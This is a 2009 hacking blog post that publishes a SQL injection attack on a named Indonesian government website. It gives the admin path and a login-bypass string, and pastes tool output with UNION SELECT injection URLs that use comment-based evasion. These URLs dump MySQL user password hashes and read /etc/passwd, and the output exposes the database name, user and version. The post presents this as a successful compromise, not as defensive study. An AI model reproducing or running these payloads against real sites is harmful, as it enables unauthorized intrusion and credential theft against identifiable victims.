viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Thursday, February 5, 2009

[SQLi] http://www.nafed.go.id

3:57 PM Posted by viperfx07 No comments


Tools: schemafuzz.py v5.0 mod by me.
Admin loc: /admin
Admin user/pwd: enter this "' or 'a'='a" (without double quotes) to both fields.
Ps: It's already been owned by some Turkey hackers. ^^


[+] URL:http://www.nafed.go.id/mediacenter.php?ctrl=info&idberita=6'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,sqli,4,5,6,7,8/*
[+] Evasion Used: "/**/" "/*"
[+] 15:58:10
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: bpendb
User: bpendb@localhost
Version: 5.0.27-log

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://www.nafed.go.id/mediacenter.php?ctrl=info&idberita=6'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,concat(user,0x3a,password),4,5,6,7,8/**/FROM/**/mysql.user/*

[+] Do we have Access to Load_File: Yes <-- w00t w00t
[!] http://www.nafed.go.id/mediacenter.php?ctrl=info&idberita=6'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,load_file(0x2f6574632f706173737764),4,5,6,7,8/*

[-] [15:58:19]
[-] Total URL Requests 3
[-] Done

[+] URL:http://www.nafed.go.id/mediacenter.php?ctrl=info&idberita=6'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,sqli,4,5,6,7,8/*
[+] Evasion Used: "/**/" "/*"
[+] 15:48:17
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: bpendb
User: bpendb@localhost
Version: 5.0.27-log
[+] Showing Tables & Columns from database "bpendb"
[+] Number of Tables: 110

Stop here because too many tables.

0 comments:

Post a Comment